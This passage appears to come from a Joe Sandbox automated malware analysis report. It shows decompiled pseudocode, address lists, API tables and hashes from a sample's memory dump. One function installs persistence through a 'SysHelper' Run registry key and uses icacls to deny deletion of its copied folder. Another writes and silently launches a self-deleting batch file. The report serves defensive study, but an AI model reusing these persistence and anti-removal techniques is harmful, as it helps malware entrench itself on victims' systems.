					 *(_t281 + _t280 * 4 - 0x78) =  *(_t281 + _t280 * 4 - 0x78) +  *((intOrPtr*)(_t281 + _t259 + _t280 * 4 - 0x78));
					_t272 =  *(_t281 + _t280 * 4 - 0x78);
					_t280 = _t280 + 1;
					 *((char*)(_t235 - 5)) = _t272 >> 8;
					 *(_t235 - 6) = _t272;
					 *((char*)(_t235 - 4)) = _t272 >> 0x10;
					 *((char*)(_t235 - 3)) = _t272 >> 0x18;
					_t284 = _t280 - 0x10;
				} while (_t284 < 0);
				 *((intOrPtr*)(_t277 + 0x20)) =  *((intOrPtr*)(_t277 + 0x20)) + 1;
				 *((intOrPtr*)(_t277 + 0x24)) =  *((intOrPtr*)(_t277 + 0x24));
				return 0 | _t284 == 0x00000000;
			}

0x0040bdcb
0x0040bdd2
0x0040bdd5
0x0040bdd9
0x0040bdde
0x0040bde3
0x0040bde8
0x0040bded
0x0040bdf5
0x0040bdfa
0x0040bdfd
0x0040be03
0x0040be09
0x0040be0f
0x0040be15
0x0040be1b
0x0040be21
0x0040be27
0x0040be2d
0x0040be32
0x0040be35
0x0040be38
0x0040be3b
0x0040be3e
0x0040be44
0x0040be47
0x0040be4a
0x0040be4d
0x0040be50
0x0040be55
0x0040be58
0x0040be61
0x0040be64
0x0040be6d
0x0040be70
0x0040be77
0x0040be7a
0x0040be7d
0x0040be86
0x0040be89
0x0040be92
0x0040be95
0x0040be97
0x0040be9f
0x0040bea2
0x0040beaa
0x0040bead
0x0040beb5
0x0040beb8
0x0040bebf
0x0040bec2
0x0040beca
0x0040becd
0x0040bed4
0x0040beda
0x0040bedd
0x0040bee3
0x0040bee6
0x0040bee8
0x0040bef1
0x0040bef4
0x0040befb
0x0040befe
0x0040bf01
0x0040bf06
0x0040bf09
0x0040bf11
0x0040bf14
0x0040bf17
0x0040bf1a
0x0040bf20
0x0040bf23
0x0040bf26
0x0040bf29
0x0040bf2f
0x0040bf35
0x0040bf3c
0x0040bf3f
0x0040bf42
0x0040bf48
0x0040bf50
0x0040bf53
0x0040bf56
0x0040bf59
0x0040bf5f
0x0040bf62
0x0040bf65
0x0040bf6b
0x0040bf72
0x0040bf75
0x0040bf78
0x0040bf7b
0x0040bf7e
0x0040bf83
0x0040bf86
0x0040bf8c
0x0040bf91
0x0040bf94
0x0040bf97
0x0040bf9c
0x0040bf9f
0x0040bfa6
0x0040bfa9
0x0040bfac
0x0040bfaf
0x0040bfb4
0x0040bfb7
0x0040bfb9
0x0040bfbb
0x0040bfc1
0x0040bfc7
0x0040bfca
0x0040bfd0
0x0040bfd6
0x0040bfd9
0x0040bfdb
0x0040bfde
0x0040bfe4
0x0040bfe7
0x0040bfec
0x0040bfef
0x0040bff4
0x0040bff7
0x0040bff9
0x0040bff9
0x0040bffc
0x0040bffc
0x0040c008
0x0040c00b
0x0040c00e
0x0040c013
0x0040c019
0x0040c01c
0x0040c01e
0x0040c021
0x0040c023
0x0040c02a
0x0040c02d
0x0040c031
0x0040c03a
0x0040c03b
0x0040c040
0x0040c049
0x0040c04c
0x0040c04f
0x0040c04f
0x0040c054
0x0040c05f
0x0040c068

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
Instruction ID: dd0030fd0a7875149aee9059f6285016d8f613d36493dd9a45a836b4a4b814ec
Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
Instruction Fuzzy Hash: 83B16BB5E002199FCB84DFE9C985ADEFBF0FF48210F64816AD515E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 00420F30 Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00420F30(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}

0x00420f30
0x00420f37
0x00420f8c
0x00420f8c
0x00420f39
0x00420f39
0x00420f3f
0x00420f49
0x00420f61
0x00420f61
0x00420f64
0x00420f78
0x00420f78
0x00420f7b
0x00000000
0x00420f7d
0x00420f7d
0x00420f7d
0x00420f7f
0x00420f84
0x00000000
0x00000000
0x00420f86
0x00420f89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00420f89
0x00000000
0x00420f7d
0x00420f66
0x00420f73
0x00420f92
0x00420f94
0x00420fa2
0x00420fab
0x00000000
0x00420fad
0x00420fb0
0x00420fb2
0x00420fdc
0x00420fb4
0x00420fb4
0x00420fb6
0x00420fd6
0x00420fb8
0x00420fbb
0x00420fbd
0x00420fd0
0x00420fbf
0x00420fc1
0x00000000
0x00420fc3
0x00000000
0x00420fc3
0x00420fc1
0x00420fbd
0x00420fb6
0x00420fb2
0x00000000
0x00420f8d
0x00420f8d
0x00420f8d
0x00000000
0x00420f77
0x00420f4b
0x00420f4b
0x00420f4b
0x00420f4d
0x00420f52
0x00000000
0x00000000
0x00420f54
0x00420f57
0x00000000
0x00420f59
0x00420f5f
0x00000000
0x00000000
0x00000000
0x00000000
0x00420f5f
0x00000000
0x00420f57
0x00420fc6
0x00420fca
0x00420fca
0x00420f49
0x00000000

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 4d4153effdc54993d1d24102320792f46c30032caadd031e430906af4f03bf0d
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 191178773C10B143D634CA2DF6B46F7A3E5EFC5320BAF43ABD0418B756D2AAA8419508

Uniqueness

Uniqueness Score: -1.00%

Function 0040A660 Relevance: .1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0040A660(void* __ecx) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed char _t62;
				signed char _t65;
				signed char _t66;
				void* _t69;
				signed char _t70;
				signed char _t72;
				unsigned char _t88;
				void* _t92;

				_push(__ecx);
				_t69 = __ecx + 2;
				_t92 = 4;
				do {
					_t70 =  *((intOrPtr*)(_t69 + 1));
					_t69 = _t69 + 4;
					_t72 = _t70 ^  *(_t69 - 4);
					_t65 =  *(_t69 - 5);
					_v6 = 0x1b;
					_v7 = _t72;
					_v5 = _t72 ^ 0x0000001b ^ _t65;
					 *(_t69 - 6) = 0x0000001b ^ ((0x0000001b ^ _t65) >> 0x00000007) * ((0x0000001b ^ _t65) >> 0x00000007) >> 0x00000020 ^ _v6 ^ _v5;
					_t66 = _v5;
					 *(_t69 - 5) = ((_t65 ^ _t65) >> 0x00000007) * 0x0000001b ^ ((_t65 ^ _t65) >> 0x00000007) * ((_t65 ^ _t65) >> 0x00000007) >> 0x00000020 ^ _t65 ^ _t66;
					_t88 = _v7 ^ _v6;
					 *(_t69 - 4) = 0x0000001b ^ _t88 ^ _t66 ^ _t66;
					_t62 = (_t88 >> 0x00000007) * 0x0000001b ^ (_t88 >> 0x00000007) * (_t88 >> 0x00000007) >> 0x00000020 ^ _v7 ^ _t66;
					 *(_t69 - 3) = _t62;
					_t92 = _t92 - 1;
				} while (_t92 != 0);
				return _t62;
			}

0x0040a663
0x0040a666
0x0040a669
0x0040a670
0x0040a670
0x0040a673
0x0040a67e
0x0040a680
0x0040a685
0x0040a688
0x0040a691
0x0040a6af
0x0040a6c1
0x0040a6c6
0x0040a6d7
0x0040a6e0
0x0040a6f1
0x0040a6f3
0x0040a6f6
0x0040a6f6
0x0040a702

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction ID: 12798de650c464c34aa3778ce5e64fe04281c395c40e5146a0d3500761537530
Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction Fuzzy Hash: 7E113D0A8492C4BDCF424A7840E56EBEFA58E37218F4A71DA88C45B753D01B190FE7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00411CD0(void* __ebx, void* __edx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v16;
				WCHAR* _v24;
				void* _v28;
				void* _v32;
				int _v36;
				intOrPtr _v40;
				WCHAR* _v44;
				char _v60;
				int _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				int _v92;
				intOrPtr _v96;
				WCHAR* _v100;
				char _v116;
				intOrPtr _v120;
				char _v140;
				struct _PROCESS_INFORMATION _v156;
				char _v172;
				struct _STARTUPINFOW _v248;
				short _v2296;
				char _v4342;
				short _v4344;
				char _v6390;
				char _v6392;
				short _v8440;
				short _v12536;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t124;
				intOrPtr _t133;
				_Unknown_base(*)()* _t137;
				short _t150;
				intOrPtr _t160;
				long _t171;
				intOrPtr _t207;
				void* _t213;
				void* _t221;
				intOrPtr* _t223;
				signed int _t225;
				WCHAR* _t228;
				signed int _t230;
				intOrPtr* _t232;
				signed int _t234;
				intOrPtr* _t237;
				signed int _t239;
				intOrPtr _t242;
				void* _t245;
				WCHAR* _t246;
				void* _t247;
				void* _t248;
				void* _t250;
				void* _t253;
				void* _t257;
				intOrPtr _t263;
				void* _t264;
				void* _t266;

				_t221 = __ebx;
				_push(0xffffffff);
				_push(0x4cac68);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t263;
				E0042F7C0(0x30e8);
				_push(_t253);
				_v32 = 0;
				_t250 = __edx;
				_t124 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v32);
				if(_t124 != 0) {
					L50:
					 *[fs:0x0] = _v16;
					return _t124;
				}
				_v6392 = _t124;
				_v36 = 1;
				E0042B420( &_v6390, _t124, 0x7fe);
				_t264 = _t263 + 0xc;
				_v64 = 0x400;
				RegQueryValueExW(_v32, L"SysHelper", 0,  &_v36,  &_v6392,  &_v64);
				RegCloseKey(_v32);
				_v40 = 7;
				_v44 = 0;
				_v60 = 0;
				if(_v6392 != 0) {
					_t223 =  &_v6392;
					_t245 = _t223 + 2;
					do {
						_t133 =  *_t223;
						_t223 = _t223 + 2;
					} while (_t133 != 0);
					_t225 = _t223 - _t245 >> 1;
					L6:
					_push(_t225);
					E00415C10(_t221,  &_v60, _t250, _t253,  &_v6392);
					_v8 = 0;
					_t255 = _v44;
					if(_v44 == 0) {
						L19:
						_v8 = 0xffffffff;
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_t137 = GetProcAddress(LoadLibraryW(L"Shell32.dll"), "SHGetFolderPathW");
						_t256 = _t137;
						_v92 = 0;
						lstrcpyW( &_v8440,  *(CommandLineToArgvW(GetCommandLineW(),  &_v92)));
						_v36 = PathFindFileNameW( &_v8440);
						 *_t137(0, 0x1c, 0, 0,  &_v2296);
						__imp__UuidCreate( &_v172);
						_v24 = 0;
						__imp__UuidToStringW( &_v172,  &_v24);
						_t246 = _v24;
						_v96 = 7;
						_v100 = 0;
						_v116 = 0;
						if( *_t246 != 0) {
							_t228 = _t246;
							_t57 =  &(_t228[1]); // 0x2
							_t256 = _t57;
							do {
								_t150 =  *_t228;
								_t228 =  &(_t228[1]);
							} while (_t150 != 0);
							_t230 = _t228 - _t256 >> 1;
							goto L26;
						} else {
							_t230 = 0;
							L26:
							E00415C10(_t221,  &_v116, _t250, _t256, _t246);
							_v8 = 1;
							__imp__RpcStringFreeW( &_v24, _t230);
							_t257 = PathAppendW;
							_t154 =  >=  ? _v116 :  &_v116;
							PathAppendW( &_v2296,  >=  ? _v116 :  &_v116);
							CreateDirectoryW( &_v2296, 0);
							if(_t250 == 0) {
								L33:
								_v68 = 7;
								_v72 = 0;
								_v88 = 0;
								if(_v2296 != 0) {
									_t232 =  &_v2296;
									_t247 = _t232 + 2;
									do {
										_t160 =  *_t232;
										_t232 = _t232 + 2;
									} while (_t160 != 0);
									_t234 = _t232 - _t247 >> 1;
									L38:
									_push(_t234);
									E00415C10(_t221,  &_v88, _t250, _t257,  &_v2296);
									_v8 = 2;
									PathAppendW( &_v2296, _v36);
									DeleteFileW( &_v2296);
									CopyFileW( &_v8440,  &_v2296, 0);
									_v28 = 0;
									_t171 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v28);
									if(_t171 != 0) {
										L45:
										if(_v68 >= 8) {
											L00422587(_v88);
											_t264 = _t264 + 4;
										}
										_t124 = 0;
										_v68 = 7;
										_v72 = 0;
										_v88 = 0;
										if(_v96 >= 8) {
											_push(_v116);
											L49:
											_t124 = L00422587();
										}
										goto L50;
									}
									_v4344 = _t171;
									E0042B420( &_v4342, _t171, 0x7fe);
									_t266 = _t264 + 0xc;
									lstrcpyW( &_v4344, "\"");
									lstrcatW( &_v4344,  &_v2296);
									lstrcatW( &_v4344, L"\" --AutoStart");
									RegSetValueExW(_v28, L"SysHelper", 0, 2,  &_v4344, lstrlenW( &_v4344) + _t183);
									RegCloseKey(_v28);
									_t236 = _a4;
									if(_a4 != 0) {
										E00413260(_t236, lstrcpyW,  &_v2296);
									}
									E0042B420( &_v248, 0, 0x44);
									_t264 = _t266 + 0xc;
									_v248.cb = 0x44;
									_v248.dwFlags = 1;
									_v248.wShowWindow = 0;
									SetLastError(0);
									lstrcpyW( &_v12536, L"icacls \"");
									_t194 =  >=  ? _v88 :  &_v88;
									lstrcatW( &_v12536,  >=  ? _v88 :  &_v88);
									lstrcatW( &_v12536, L"\" /deny *S-1-1-0:(OI)(CI)(DE,DC)");
									if(CreateProcessW(0,  &_v12536, 0, 0, 0, 0x48, 0, 0,  &_v248,  &_v156) != 0) {
										do {
										} while (WaitForSingleObject(_v156, 1) == 0x102);
									} else {
										GetLastError();
									}
									goto L45;
								}
								_t234 = 0;
								goto L38;
							}
							if(_v2296 != 0) {
								_t237 =  &_v2296;
								_t68 = _t237 + 2; // 0x2
								_t248 = _t68;
								do {
									_t207 =  *_t237;
									_t237 = _t237 + 2;
								} while (_t207 != 0);
								_t239 = _t237 - _t248 >> 1;
								L32:
								_push(_t239);
								E00415C10(_t221, _t250, _t250, _t257,  &_v2296);
								goto L33;
							}
							_t239 = 0;
							goto L32;
						}
					}
					_t213 = E00413520( &_v60,  &_v140, 1, _t255 - lstrlenA("\" --AutoStart") - 1);
					_t262 = _t213;
					if( &_v60 != _t213) {
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_v40 = 7;
						_v44 = 0;
						_v60 = 0;
						E004145A0( &_v60, _t262);
					}
					if(_v120 >= 8) {
						L00422587(_v140);
						_t264 = _t264 + 4;
					}
					_t216 =  >=  ? _v60 :  &_v60;
					_t124 = PathFileExistsW( >=  ? _v60 :  &_v60);
					if(_t124 == 0) {
						goto L19;
					} else {
						_t242 = _a4;
						if(_t242 != 0) {
							_t124 =  &_v60;
							if(_t242 != _t124) {
								_push(0xffffffff);
								_t124 = E00414690(_t221, _t242, _t124, 0);
							}
						}
						if(_v40 < 8) {
							goto L50;
						} else {
							_push(_v60);
							goto L49;
						}
					}
				}
				_t225 = 0;
				goto L6;
			}

0x00411cd0
0x00411cd9
0x00411cdb
0x00411ce0
0x00411ce6
0x00411ced
0x00411cf2
0x00411cf7
0x00411d10
0x00411d12
0x00411d1a
0x00412207
0x0041220b
0x00412216
0x00412216
0x00411d26
0x00411d34
0x00411d3b
0x00411d40
0x00411d43
0x00411d63
0x00411d6c
0x00411d74
0x00411d7b
0x00411d82
0x00411d8d
0x00411d93
0x00411d99
0x00411da0
0x00411da0
0x00411da3
0x00411da6
0x00411dad
0x00411daf
0x00411daf
0x00411dba
0x00411dbf
0x00411dc6
0x00411dcb
0x00411e7c
0x00411e7c
0x00411e87
0x00411e8c
0x00411e91
0x00411e91
0x00411ea5
0x00411eab
0x00411ead
0x00411ece
0x00411ee1
0x00411ef3
0x00411efc
0x00411f05
0x00411f14
0x00411f1a
0x00411f1f
0x00411f26
0x00411f2d
0x00411f34
0x00411f3a
0x00411f3c
0x00411f3c
0x00411f40
0x00411f40
0x00411f43
0x00411f46
0x00411f4d
0x00000000
0x00411f36
0x00411f36
0x00411f4f
0x00411f54
0x00411f5c
0x00411f64
0x00411f71
0x00411f77
0x00411f83
0x00411f8e
0x00411f96
0x00411fce
0x00411fd0
0x00411fd7
0x00411fde
0x00411fe9
0x00411fef
0x00411ff5
0x00412000
0x00412000
0x00412003
0x00412006
0x0041200d
0x0041200f
0x0041200f
0x0041201a
0x0041201f
0x0041202d
0x00412036
0x0041204c
0x00412055
0x0041206e
0x00412076
0x004121d1
0x004121d5
0x004121da
0x004121df
0x004121df
0x004121e2
0x004121e4
0x004121ef
0x004121f6
0x004121fa
0x004121fc
0x004121ff
0x004121ff
0x00412204
0x00000000
0x004121fa
0x00412082
0x00412090
0x004120a1
0x004120aa
0x004120c0
0x004120ce
0x004120f3
0x004120fc
0x00412102
0x00412107
0x00412110
0x00412110
0x00412120
0x00412125
0x00412128
0x00412134
0x0041213e
0x00412146
0x00412158
0x00412161
0x0041216d
0x0041217b
0x004121a8
0x004121c0
0x004121ca
0x004121aa
0x004121aa
0x004121aa
0x00000000
0x004121a8
0x00411feb
0x00000000
0x00411feb
0x00411fa0
0x00411fa6
0x00411fac
0x00411fac
0x00411fb0
0x00411fb0
0x00411fb3
0x00411fb6
0x00411fbd
0x00411fbf
0x00411fbf
0x00411fc9
0x00000000
0x00411fc9
0x00411fa2
0x00000000
0x00411fa2
0x00411f34
0x00411dec
0x00411df1
0x00411df8
0x00411dfe
0x00411e03
0x00411e08
0x00411e08
0x00411e0d
0x00411e18
0x00411e1f
0x00411e23
0x00411e23
0x00411e2c
0x00411e34
0x00411e39
0x00411e39
0x00411e43
0x00411e48
0x00411e50
0x00000000
0x00411e52
0x00411e52
0x00411e57
0x00411e59
0x00411e5e
0x00411e60
0x00411e65
0x00411e65
0x00411e5e
0x00411e6e
0x00000000
0x00411e74
0x00411e74
0x00000000
0x00411e74
0x00411e6e
0x00411e50
0x00411d8f
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32 ref: 00411ECE
PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4(?), ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32 ref: 004120AA
lstrcatW.KERNEL32(?,?), ref: 004120C0
lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32 ref: 00412158
lstrcatW.KERNEL32(?,?), ref: 0041216D

Strings

SHGetFolderPathW, xrefs: 00411E9F
icacls ", xrefs: 0041214C
SysHelper, xrefs: 00411D5B, 004120EB
D, xrefs: 00412128
" --AutoStart, xrefs: 00411DD1
" --AutoStart, xrefs: 004120C2
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
Shell32.dll, xrefs: 00411E94

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004124E0() {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				char _v364;
				char _v628;
				void _v1668;
				char _v1932;
				char _v2956;
				long _t40;
				signed int _t48;
				void* _t78;
				intOrPtr _t79;
				int _t104;
				long _t106;
				int _t108;
				void* _t110;
				intOrPtr* _t113;
				void* _t115;

				if( *0x513234 == 0) {
					 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
					_t40 = GetLastError();
					_push( *0x513230);
					if(_t40 != 0xb7) {
						CloseHandle();
						 *0x513230 = 0;
						goto L7;
					} else {
						_t104 = CloseHandle();
						 *0x513230 = 0;
						return _t104;
					}
				} else {
					 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
					_t106 = GetLastError();
					_push( *0x513238);
					if(_t106 != 0xb7) {
						CloseHandle();
						 *0x513238 = 0;
						L7:
						if(E00412360() == 0) {
							GetModuleFileNameA(0,  &_v628, 0x104);
							GetShortPathNameA( &_v628,  &_v628, 0x104);
							_t48 = GetEnvironmentVariableA("TEMP",  &_v1932, 0x104);
							asm("sbb eax, eax");
							lstrcpyA( &_v364, _t48 &  &_v1932);
							lstrcatA( &_v364, "\\");
							lstrcatA( &_v364, "delself.bat");
							lstrcpyA( &_v1668, "@echo off\r\n:try\r\ndel \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\"\r\nif exist \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\" goto try\r\n");
							lstrcatA( &_v1668, "del \"");
							lstrcatA( &_v1668,  &_v364);
							lstrcatA( &_v1668, "\"");
							if(PathFileExistsA( &_v364) != 0) {
								DeleteFileA( &_v364);
							}
							_t78 = CreateFileA( &_v364, 0xc0000000, 3, 0, 2, 0x80, 0);
							_t113 =  &_v1668;
							_t110 = _t78;
							_t115 = _t113 + 1;
							do {
								_t79 =  *_t113;
								_t113 = _t113 + 1;
							} while (_t79 != 0);
							WriteFile(_t110,  &_v1668, _t113 - _t115,  &_v8, 0);
							FlushFileBuffers(_t110);
							CloseHandle(_t110);
							E0042B420( &_v100, 0, 0x44);
							_v100.cb = 0x44;
							_v100.dwFlags = 1;
							_v100.wShowWindow = 0;
							SetLastError(0);
							lstrcpyA( &_v2956, "\"");
							lstrcatA( &_v2956,  &_v364);
							lstrcatA( &_v2956, "\"");
							CreateProcessA(0,  &_v2956, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24);
							CloseHandle(_v24.hThread);
							return CloseHandle(_v24);
						} else {
							return E00412440();
						}
					} else {
						_t108 = CloseHandle();
						 *0x513238 = 0;
						return _t108;
					}
				}
			}

0x004124f3
0x00412556
0x0041255b
0x00412561
0x0041256c
0x0041258b
0x0041258d
0x00000000
0x0041256e
0x0041256e
0x00412574
0x00412584
0x00412584
0x004124f5
0x00412504
0x00412509
0x0041250f
0x0041251a
0x00412539
0x0041253b
0x00412597
0x0041259e
0x004125ba
0x004125cd
0x004125e4
0x004125fa
0x00412606
0x0041261a
0x00412628
0x00412636
0x00412646
0x00412654
0x00412664
0x00412672
0x00412680
0x00412690
0x0041269e
0x004126af
0x004126b8
0x004126b8
0x004126d7
0x004126dd
0x004126e3
0x004126e5
0x004126e8
0x004126e8
0x004126ea
0x004126eb
0x00412700
0x00412707
0x0041270e
0x00412718
0x00412720
0x00412729
0x00412730
0x00412735
0x00412747
0x0041275b
0x00412769
0x00412788
0x00412791
0x0041279e
0x004125a0
0x004125ab
0x004125ab
0x0041251c
0x0041251c
0x00412522
0x00412532
0x00412532
0x0041251a

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
